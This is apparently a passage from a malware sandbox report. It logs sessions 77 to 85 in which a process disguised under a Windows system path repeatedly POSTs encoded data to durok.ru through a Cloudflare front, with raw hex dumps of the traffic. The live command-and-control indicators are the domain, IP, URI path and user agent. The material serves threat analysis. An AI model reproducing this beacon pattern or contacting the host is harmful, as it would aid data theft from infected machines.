                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8358&min_rtt=1784&rtt_var=13818&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=26847&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.4 | 49885 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:30.533382893 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:30.880510092 CET | 2128 | OUT | Data Raw: 5c 5b 5e 5e 54 5c 5c 52 5e 58 52 54 56 58 58 55 54 57 5b 54 56 5f 53 58 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \[^^T\\R^XRTVXXUTW[TV_SXPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'<"0_+:!5T#..6>&Y' 7/ ,[.\ ?0*%"Z.#Z*"
Dec 26, 2024 17:18:31.710469961 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:31.961982012 CET | 946 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:31 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JAOSxu4E3Uf%2FwI1O4kOuULm1TA0NftezZecrpZylHBeAwupW5qeV%2FqGLd8vD9fCY9pHUDHwQnOsyzrb0PhLywFmZkNzvdxsbctOtlILIINr%2FDjmOrmcfu3TT1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263232c0ac407-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8202&min_rtt=1709&rtt_var=13628&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=27208&cwnd=196&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 1e 29 2a 3c 0e 20 5a 30 56 28 2d 21 0f 29 08 22 04 2a 22 2d 17 28 3f 22 52 2b 3b 37 1a 20 5c 2d 02 28 3a 3b 01 31 18 25 03 25 21 2e 5c 05 1d 24 05 3e 38 23 07 33 31 2a 00 2b 3e 31 18 28 2d 22 03 27 59 3c 05 37 5d 36 5c 22 31 34 5d 3b 2c 3f 06 3a 02 2f 00 2a 20 07 04 35 3d 21 51 0c 1f 38 1c 35 3a 20 00 31 3e 2a 0b 22 30 28 09 25 28 22 56 21 2b 3f 1d 30 14 3b 58 32 0d 23 1e 22 3e 27 55 3c 3e 32 5b 31 3f 35 5a 3d 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$)*< Z0V(-!)"*"-(?"R+;7 \-(:;1%%!.\$>8#31*+>1(-"'Y<7]6\"14];,?:/* 5=!Q85: 1>*"0(%("V!+?0;X2#">'U<>2[1?5Z=9%^-#T>TV0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.4 | 49889 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:31.452398062 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:31.803553104 CET | 2548 | OUT | Data Raw: 59 50 5e 51 51 5b 5c 57 5e 58 52 54 56 5d 58 50 54 54 5b 54 56 55 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YP^QQ[\W^XRTV]XPTT[TVUS^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$<2<Z+*!T!1(..>4&Y$'87<(W",2-9(<<\="Z.#Z*6
Dec 26, 2024 17:18:32.628463030 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:32.881541014 CET | 797 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:32 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rIub%2BOAh01qx%2BFcMNrpmWznnI0n6lCOPPpDYsPJY9CjSkQLGKcXfbqcRmE2QBwIS4B277O7yWJJ7flEYfHGkxUUb4XZ3LXhniPRQ03Xe3%2BNbydQHTudWHVCg1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826328ed327290-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3066&min_rtt=1843&rtt_var=3138&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=125515&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0
Dec 26, 2024 17:18:33.131807089 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 49892 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:33.445492983 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:33.802706003 CET | 2548 | OUT | Data Raw: 59 5e 5e 5d 54 58 5c 56 5e 58 52 54 56 5c 58 50 54 57 5b 5d 56 53 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y^^]TX\V^XRTV\XPTW[]VSS[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$<2 _<)W!"(Z,W=._$'\ <'#9::;?<]+5"Z.#Z*2
Dec 26, 2024 17:18:34.624866009 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:34.870090008 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:34 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7tbA7S%2B7Ox4jkhQvwm2XG3tVgoIVHJUuUqU%2FG%2BEaRg%2FjLt%2FblRh%2BD7JnREpscS0GkdCYCp%2BKwbER5Ng2CJL0VqQcwSfpTf5eSWiNUGhP97yquOh4D5XoJwY%2FFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263355e474309-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8145&min_rtt=1709&rtt_var=13514&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=27441&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.4 | 49898 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:34.442589045 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:34.786797047 CET | 2128 | OUT | Data Raw: 59 5a 5b 5d 54 5c 59 54 5e 58 52 54 56 5e 58 56 54 50 5b 59 56 5f 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YZ[]T\YT^XRTV^XVTP[YV_SYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$<"4]>9%W!+.-&=$&X04#"?3"?1::'>3#*"Z.#Z*
Dec 26, 2024 17:18:35.623749971 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:35.869573116 CET | 946 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:35 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7HuBMvrT%2BCNAo8ByAmYQbjk1WG9K%2FO9c76LBudZrXqBpZZOMv36N7sDg1B%2FEvaEVgCW3U1TxpIE2qqZ4W8QR6euQKGplrfa9pM5ZqTI1sxMKbUUy1RbJ0hum6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82633b9fd7de9a-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8174&min_rtt=1695&rtt_var=13593&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=27275&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 59 3e 00 23 19 37 3f 24 56 28 2d 22 14 2a 21 0b 17 3c 32 22 01 29 2f 00 53 3f 06 30 08 37 3a 07 00 2a 2a 02 58 26 18 07 03 24 21 2e 5c 05 1d 27 19 28 05 3b 00 30 54 21 5f 2b 2d 25 18 29 2e 3d 5d 25 3c 23 58 20 02 3a 5e 37 32 3f 01 2c 3f 28 59 39 02 09 06 28 1e 39 04 21 2d 21 51 0c 1f 3b 0c 21 07 3b 1c 25 3e 00 0d 21 56 38 08 27 3b 2d 0a 36 2b 06 08 33 29 3f 58 31 0a 34 0f 22 2e 3c 0d 3c 13 3e 5b 32 3f 22 02 2b 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$Y>#7?$V(-"*!<2")/S?07:**X&$!.\'(;0T!_+-%).=]%<#X :^72?,?(Y9(9!-!Q;!;%>!V8';-6+3)?X14".<<>[2?"+)%^-#T>TV0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.4 | 49899 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:35.144561052 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:35.489938974 CET | 2548 | OUT | Data Raw: 59 51 5e 51 51 5f 5c 52 5e 58 52 54 56 51 58 56 54 5c 5b 5f 56 56 53 54 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ^QQ_\R^XRTVQXVT\[_VVSTPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'("4(9"6',&=7>Y0'#4?/",--B?;>"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:36.322590113 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:36.573695898 CET | 801 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:36 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zS%2B95oQNpJ2n4fJRm8qXp6oK0DrW0%2Bx132RQ47GQcDH3u7K2c8opVwR9y8Djj2WtqEjDMVFDKuEvZrW05vf9Fj3VLOA5%2BnGZZv%2BRTs%2B%2Bq0kBUuSf2ueAiTXt9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82633ffeae428f-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3861&min_rtt=1579&rtt_var=5157&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=73585&cwnd=99&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              82 | 192.168.2.4 | 49905 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:18:36.830749035 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:37.177422047 CET | 2548 | OUT
                                                                                                                              Dec 26, 2024 17:18:38.008965969 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:38.262115955 CET | 794 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:38 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eEFScEqxFM2HYi8rj7I5SvlNW2vqUFWj%2BAQ5961dCWZVsA1B23TMwr15GaOKM3%2BslR7SA3euOKFSSPP9fE2BqwPtAkDVWTO5YnIokWlAJFx6CFff0gxCpNsXDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82634a8c0f7cea-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4220&min_rtt=1772&rtt_var=5560&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=68364&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              83 | 192.168.2.4 | 49906 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:18:36.970320940 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:37.318070889 CET | 2128 | OUT
                                                                                                                              Dec 26, 2024 17:18:38.149158955 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:38.579509974 CET | 953 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:38 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bo7HqQ00yqsf4pG3%2Bw3IuAFqJL4EUkfzeRo9RE%2B%2BFlf3CSZa078CfAbAb9asSOHvNsGl6P%2FdoD%2B69yLClsuqV1LtAS6nc6LNzl1U%2BaYKgWXjO4ede8zCy7t%2Fag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82634b6d21f795-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4143&min_rtt=1666&rtt_var=5580&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=67948&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Dec 26, 2024 17:18:38.579664946 CET | 953 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:38 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bo7HqQ00yqsf4pG3%2Bw3IuAFqJL4EUkfzeRo9RE%2B%2BFlf3CSZa078CfAbAb9asSOHvNsGl6P%2FdoD%2B69yLClsuqV1LtAS6nc6LNzl1U%2BaYKgWXjO4ede8zCy7t%2Fag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82634b6d21f795-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4143&min_rtt=1666&rtt_var=5580&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=67948&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Dec 26, 2024 17:18:38.728271961 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:39.061249018 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:39.061434984 CET | 2548 | OUT
                                                                                                                              Dec 26, 2024 17:18:39.579225063 CET | 801 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:39 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M1oEtZkIZIvUMgsobBJL39EEweYiWyvSM6nZMzHhvkxyvsUMSehaRHmA4yrGSlutT48TypBLlWd35%2Bc7c0MRoRMfjiCVd%2FDsq%2FZJ8qwWb5pCVulvV3EZsvHnCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263511f18f795-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=5331&min_rtt=1666&rtt_var=6525&sent=9&recv=13&lost=0&retrans=0&sent_bytes=1003&recv_bytes=5290&delivery_rate=1595628&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              84 | 192.168.2.4 | 49912 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:18:39.720262051 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:40.068140984 CET | 2128 | OUT
                                                                                                                              Dec 26, 2024 17:18:40.897283077 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:41.149702072 CET | 948 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:40 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pxSMK%2BqvlGZatTV%2B0z%2B8q8AH3LsTKKWBI7kxRYCobxknbAwUsvtR3BljzoHxMt83HVz62UxJmFe2JKkeIZTOiGC9rKv3CR%2Fss3GQ58PuEZHZkFSo0fV4PwlocA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82635c9ff14257-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8206&min_rtt=1598&rtt_var=13815&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=26807&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              85 | 192.168.2.4 | 49913 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:18:39.825892925 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:40.177405119 CET | 2548 | OUT
